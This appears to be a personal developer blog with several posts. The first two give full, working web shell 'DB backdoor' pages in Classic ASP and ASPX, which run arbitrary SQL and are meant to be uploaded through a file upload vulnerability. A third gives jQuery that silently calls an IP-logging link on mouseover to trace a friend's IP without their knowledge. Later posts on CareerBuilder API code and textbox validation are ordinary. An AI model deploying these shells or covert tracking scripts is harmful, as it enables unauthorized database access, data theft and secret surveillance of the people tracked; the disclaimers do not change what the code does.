Classic ASP (Active Server Pages) With MS SQL Server DB Backdoor

Disclaimer : The information provided here is to be used for  educational purposes only. The website creator is in no way responsible  for any misuse of the information provided. All of the information in  this website is meant to help the reader develop a hacker defense  attitude in order to prevent the attacks discussed. In no way should you  use the information to cause any kind of damage directly or indirectly.

Assumption
———
1. ASP.Net application is having File Upload vulnerability.
2.We grabbed usename,password,dbname,servername of the Database.
3. Application is not allowing the user to upload files with more than 3 character extension.

Let’s get started.

1. Create asp page
Create asp page without code embedded with VB Script.

<% @Language=VBScript %>
<html dir=ltr>
<head>
<title>Classic asp DB Shell</title>
<style>	
.dblabel{width: 26%; float: left; padding: 0 0 4 0; text-align: right;}
.dbText{ width : 50%; float:left; padding: 0 0 4 0;}
</style>
</head>
<body>
<h1>Db Info</h1>
<form method="post">

</form>
</body>
</html>

2. Add basic fields
After adding the empty asp page we need to add input fields which need to be passed to connection string as well as query to be executed.

<div style="width:50%;">
   <div class="dblabel">Server Name : </div>
   <div class="dbText"><input type="text" name="sName" /></div>
   <div class="dblabel">Server Port : </div>
   <div class="dbText"><input type="text" name="sPort" /></div>
   <div class="dblabel">User Name : </div>
   <div class="dbText"><input type="text" name="dbUName" /></div>
   <div class="dblabel">Password : </div>
   <div class="dbText"><input type="text" name="dbPass" /></div>
   <div class="dblabel">Database : </div>
   <div class="dbText"><input type="text" name="dbName" /></div>
   <div class="dblabel">Query :</div>
   <div class="dbText"><textarea name="query" rows="4" cols="50"></textarea></div>
   <div class="dblabel"></div>
   <div class="dbText"><input type="submit" name="submit" value="Run Query"/></div>
</div>

3. Write Business logic
Start writing the business logic to execute the query. Validate all input fields before proceeding. After executing the query try to display all records in tabular format.

<%
		Dim fname 
		fname=Request.Form("submit")
		
		Response.Buffer = True 
		On Error Resume Next
		
		Dim host
		Dim port
		Dim user
		Dim password
		Dim database

		host = Request.Form("sName")
		port = Request.Form("sPort")
		user = Request.Form("dbUName")
		password = Request.Form("dbPass")
		database = Request.Form("dbName")
		
		If host <> "" And port <> "" And user <> "" And password <> "" And database <> ""  Then
			Dim conn
			Set conn = Server.CreateObject("ADODB.Connection")
			Dim ds
			ds = host & "," & port
			Dim connString
			connString = "Provider=SQLOLEDB;Data Source=" & ds & ";Network Library=DBMSSOCN;Initial Catalog=" & database & ";User Id=" & user & ";Password=" & password & ";"
			conn.Open connString
			If conn.Errors.Count > 0 Then
				Response.Write "Error: Unable to Connect" & Err.Description
				Response.END
			End If
			
			Dim query
			query = Request.Form("query")
			
			If query <> "" Then
				Set rs = conn.Execute(query)
				If conn.Errors.Count > 0 Then
					Response.Write "Error: " & Err.Description
				Else
					Response.Write "<html><body><table><tr>"
					For Each objField in rs.Fields
						Response.Write "<td>" & objField.Name & "</td>"
					Next
					Response.Write "</tr>"

					While Not rs.EOF
						Response.Write "<tr>"
						For Each objField in rs.Fields
							Response.Write "<td>" & rs(objField.Name) & "</td>"
						Next
						rs.MoveNext
						Response.Write "</tr>"
					Wend
					
					rs.Close
				End If
			End If
			
			conn.Close
			Set conn = Nothing
		End If
	%>

It’s all over. This will establish a connection to MS SQL Server to get records from DB.
Bingo….!!!!

Posted in DB Backdoor, Hacking | Tagged , , | Leave a comment

Create ASP.NET Database Backdoor Shell

This post is not encouraging any king of Malicious activities. This is intended to education purpose only. Any one can use this code with their own risk. Developer is not responsible for any bad activities.

Assumption
———
1.ASP.Net application is having File Upload vulnerability.
2.We grabbed usename,password,dbname,servername of the Database or we can directly use Connection String from Web.config in this case no need to add those fields.

For using this technique we should find the File Upload vulnerability in Asp.net application.

If we want to create a DB Backdoor we should know the Database Server. Mostly ASP.NET will use MS SQLServer as Database. Some times it can be MySQL, SQLite or Oracle etc.

Developer should identify which Database server is used by Vulnerable web application.

Let’s get started.

1. Create a aspx page
First we need to create aspx page without code behind c# page. We are going to use inline asp.net code in the design page itself.

<%@ Page Language="C#" EnableViewState="false" %>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>ASPX Shell</title>
</head>
<body>
<form id="form1" runat="server">
</form>
</body>
</html>

2. Add basic fields
After adding the empty aspx page we need to add input fields which need to be passed to connection string as well as query to be executed.

Server Name : <asp:TextBox ID="txtServer" runat="server"></asp:TextBox> 

User Name :   <asp:TextBox ID="txtUName" runat="server"></asp:TextBox> 

Passcode :    <asp:TextBox ID="txtPass" runat="server"></asp:TextBox> 

DB Name :     <asp:TextBox ID="txtDBName" runat="server"></asp:TextBox>

Query :  <asp:TextBox TextMode="MultiLine" ID="txtQuery" runat="server"></asp:TextBox>

<asp:Button ID="btnRun" runat="server" Text="Run Query"/> 

3. Add GridView to display the result
When you clicked on Run Query, Query need to be executed and display the result set. To display this result set we can use Gridview.

<asp:GridView ID="grdResult" runat="server"></asp:GridView>

4. Add assembly references
For Database communication we need to add assembly references try to add it by using import namespace tag.

<%@ Import Namespace="System.Web.UI.WebControls" %>
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.IO" %>
<%@ Import Namespace="System.Data.Odbc" %>
<%@ Import Namespace="System.Data.SqlClient" %>

5. Write Business logic
Start writing the business logic to execute the query. Validate all input fields before proceeding.

<%
try
{
if (!string.IsNullOrWhiteSpace(txtDBName.Text) && !string.IsNullOrWhiteSpace(txtServer.Text) && !string.IsNullOrWhiteSpace(txtUName.Text) && !string.IsNullOrWhiteSpace(txtPass.Text))
{
using (OdbcConnection connection = new OdbcConnection("DRIVER={MySQL ODBC 3.51 Driver};Database=" + txtDBName.Text + ";Server=" + txtServer.Text + ";UID=" + txtUName.Text + ";PWD=" + txtPass.Text + ";"))
{
connection.Open();
using (OdbcCommand command = new OdbcCommand(txtQuery.Text, connection))
using (OdbcDataReader dr = command.ExecuteReader())
{
grdResult.DataSource = dr;
grdResult.DataBind();
}
connection.Close();
}
}
}
catch (Exception ex)
{
Response.Write("An error occured: " + ex.Message);
}
%>

In this logic you can create any Database connection. The example here is MySQL connection.
If you want to add other connections you can modify the connection string part.

That’s it. You are ready to go.

Posted in ASP.Net, C#, Hacking | Tagged , , , | Leave a comment

2014 in review

The WordPress.com stats helper monkeys prepared a 2014 annual report for this blog.

Here’s an excerpt:

A San Francisco cable car holds 60 people. This blog was viewed about 500 times in 2014. If it were a cable car, it would take about 8 trips to carry that many people.

Click here to see the complete report.

Posted in Uncategorized | Leave a comment

Trace IP of your friend using a Image post

I am going to explain you how can we trace friends IP address by using simple jQuery code.

Take your mouse through the image.

 

There the trick is going to work. I just written simple script to fire an ajax function which will trace Client IP and send it to my personal mail address.

Lets get started.

This post is only for learning and exploring the new things not for breaking the law. If any one tries to use this for bad things I am not responsible.

Step 1 :

Create URL for getting the IP address.

For this first I created one URL which will trace IP address of user who clicks that link. We can use http://www.whatstheirip.com/ site. Just enter your personal email address and click on get link button this will give you a link with proper details. The link seems to be like this “http://www.bvog.com/?post=IDsk0Ur7YbKVpjneIq&#8221;.

 

Step 2:

The next step is to expose this URL. If you send this to your friend and ask him to click, he is not going to click. So we can use a small SE (Social Engineering) trick to achieve this. Create an interesting post and add bellow mentioned script for that post.

function AttackScript(){
    $("#aIdDestination").mouseover(function(){
           EventMouse();
    }).mouseout(function(){
           EventMouse();
    });
}

function EventMouse(){
    $("a#idLink").click();
}

In the above mentioned script I just attached mouseover and mouseout events to “aIdDestination” div. So when a user mouseover or mouseout through this div the event is going to fire no need to click the link. By using jQuery I am click the link. After click the link page will redirects to a 404 page.

Here user can find out that some thing is happened when I moved my mouse through this div and he may take preventive actions. So I just made small changes to the above mentioned script and added a ajax call to that URL. So user never knows that something is happened.

function EventMouse(){
   $.ajax({
         url: "http://www.bvog.com/?post=IDsk0Ur7YbKVpteIq",
         context: document.body
   });
}

There it is I am successfully clicked the URL with out any intimation to end user.

Posted in Hacking, IP Trace using jQuery, jQuery | Tagged , , | Leave a comment

CareerBuilder API DOT NET Code

Sample Code Download Here

This post regarding CareerBuilder REST service consumption from Dot Net.

For consuming any REST Service first we should know the URL of respective REST service. If service provider is providing any public key or private key you need to get it from service provider before using REST service.

This key trick will applicable for CareerBuilder  REST service too. To obtain a key visit the CareerBuilder site http://api.careerbuilder.com, you can get your own private key.

After receiving your Private key you can start integrating CareerBuilder REST service to your Application.  I created sample application for “JobSearch” functionality. In sample application I created a TextBox for searching jobs from CareerBuilder Service method there are lot of search criteria’s available in the service but I used only “Skill” parameter according to your requirement you can use any number of parameters.

I created a Model class to bind the individual job. Finally ListJobs method will returns the

List<Jobs> as a generic list which I am binding to a gridview.

Note : I removed my private key and replaced with xxxxxx values. You can use your private key in that place.


public static string devKey = "XXXXXXXXXXXXXXXXXXXX";
 public static string URL = "http://api.careerbuilder.com/v1/jobsearch";

#region JobSearch Web Reuest
 private XmlDocument ListJobSearch()
 {
 XmlDocument xDoc = new XmlDocument();
 string outString = string.Empty;
 try
 {
 string _url = URL + "?DeveloperKey=" + devKey + "&Skills=" + txtSkill.Text + "";
 WebRequest objRequest = WebRequest.Create(_url);
 objRequest.Method = "GET";
 objRequest.ContentType = "application/xml";
 WebResponse objResponse = objRequest.GetResponse();
 outString = new StreamReader(objResponse.GetResponseStream()).ReadToEnd();
 xDoc.LoadXml(outString);
 }
 catch (Exception ex)
 {
 throw ex;
 }
 return xDoc;
 }
 #endregion

 In the above code snippet I am trying to call the REST service with user entered skill captured from textbox. this will return xml value. I just taken the xml and converted it to xml document and converted xml document to List<jobs> in ListJobs method mentioned bellow.

</pre>
#region ListJobs Method
 private List<JobSearchModel> ListJobs()
 {
 List<JobSearchModel> objList = new List<JobSearchModel>();
 XmlDocument xDoc = ListJobSearch();
 try
 {
 XmlNodeList objNoe = xDoc.SelectNodes("/ResponseJobSearch/Results/JobSearchResult");
 foreach (XmlNode xn in objNoe)
 {
 JobSearchModel objSearchMode = new JobSearchModel();
 objSearchMode.Company = xn["Company"].InnerText;
 objSearchMode.JobTitle = xn["JobTitle"].InnerText;
 objSearchMode.CompanyDID = xn["CompanyDID"].InnerText;
 objSearchMode.CompanyDetailsURL = xn["CompanyDetailsURL"].InnerText;
 objSearchMode.ONetFriendlyTitle = xn["ONetFriendlyTitle"].InnerText;
 objSearchMode.DescriptionTeaser = xn["DescriptionTeaser"].InnerText;
 objSearchMode.EmploymentType = xn["EmploymentType"].InnerText;
 objSearchMode.JobDetailsURL = xn["JobDetailsURL"].InnerText;
 objSearchMode.JobServiceURL = xn["JobServiceURL"].InnerText;
 objSearchMode.Location = xn["Location"].InnerText;
 objSearchMode.PostedDate = xn["PostedDate"].InnerText;
 objSearchMode.Pay = xn["Pay"].InnerText;
 objSearchMode.SimilarJobsURL = xn["SimilarJobsURL"].InnerText;
 objSearchMode.CompanyImageURL = xn["CompanyImageURL"].InnerText;

objList.Add(objSearchMode);
 }
 }
 catch (Exception ex)
 {
 throw ex;
 }
 return objList;
 }
 #endregion
<pre>

After converting XmlDocument to List<T> I am just binding this List to GridView. This gridview will display every job. You can design your own format to display the jobs.

Comments are inevitable.

Posted in Uncategorized | Leave a comment

Use “onblur” javascript event to validate aspx page textbox

Download sample here

“onblur” this is an javascript event it’s functionality is when you comes out of the text field then it will fire.

This is the nature of “onblur”. It is having a fine drawback which I was faced. That drawback is if you want to validate two textboxes one after one if you use this event it will with out entering any values if you move to nextbox it will validate fine. My condition is when a required field is empty it should show an error message and the focus should go to empty field. I written code for this like bellow.

 

function ValidateName() {
        var gName = $get(‘<%= txtName.ClientID %>’);
        if (gName.value == “”) {
            alert(“Name should not be empty”);
            gName.focus();
        }

function ValidateAge() {
        var gName = $get(‘<%= txtAge.ClientID %>’);
        if (gName.value == “”) {
            alert(“Age should not be empty”);
            gName.focus();
        }
    }

 

what happen is when I use this code it given me a problem. I didn’t enter value in “txtName” field and pressed tab button then it given me an alert box and told me that “Name Should not be empty”. I felt Okay it’s working properly then I clicked on Okay button then next alert message displayed that “Age Should not be empty”. I confused when happen I didn’t go to Age text field why it is displaying this alert box, for checking the code I click on Okay button for that alert button too then first error message and next and so on. It seems like a Infinite loop for those fields. 

 

Then I posted this problem in MSDN forums one guy explained me the problem. I didn’t think in that manner. Any have I will explain the problem. When I pressed on tab button control is by default moving to next control that is Age textbox that time validation is going on that first box is empty or not If Yes it is displaying error message. The next statement is I try focus the cursor in Name field so it try to put the cursor into that field next field also having “onblur” event then It fired and displaying me the error and so on.

For this problem I have written another method to solve the problem. That is mentioned bellow.

 

function validateFirstName(data,fieldName) {
    var x = data.value;
    if (x == null || x == “”) {
        alert(fieldName + ” cannot be left blank.”);
        data.focus();
        return;
    }
}
function validate(data, fieldName, oldvalue) {
    var x = data.value;
    var y = oldvalue.value;
    if (y == null || y == “”) {
        //oldvalue.focus();
    }
    else {
        if (x == null || x == “”) {
            alert(fieldName + ” cannot be left blank.”);
            data.focus();
        }
    }
}

 

In this I am validating the first field normally. From next field onwards I am using second method so It will first validate the Previous field if it is also empty It wont do anything. So no problem we can do our work.

 

<div style=”width:100%;”>
            <span style=”width:50%;”>First Name :</span>
            <asp:TextBox ID=”txtFirstName” runat=”server” style=”width:50%;” onblur=”validateFirstName(this,’First Name’);” />
        </div><br />
        <div style=”width:100%;”>
            <span style=”width:50%;”>Last Name :</span>
            <asp:TextBox ID=”txtLastName” runat=”server” style=”width:50%;” onblur=”validate(this,’Last Name’,document.getElementById(‘txtFirstName’))” />
        </div><br />
        <div style=”width:100%;”>
            <span style=”width:50%;”>Primary EMail :</span>
            <asp:TextBox ID=”txtPrimaryEmail” runat=”server” style=”width:50%;” onblur=”validate(this,’Primary Email’,document.getElementById(‘txtLastName’))” />
        </div><br />

 

This is the code. I used to validate. You can download the sample code form above link.

Posted in Uncategorized | Leave a comment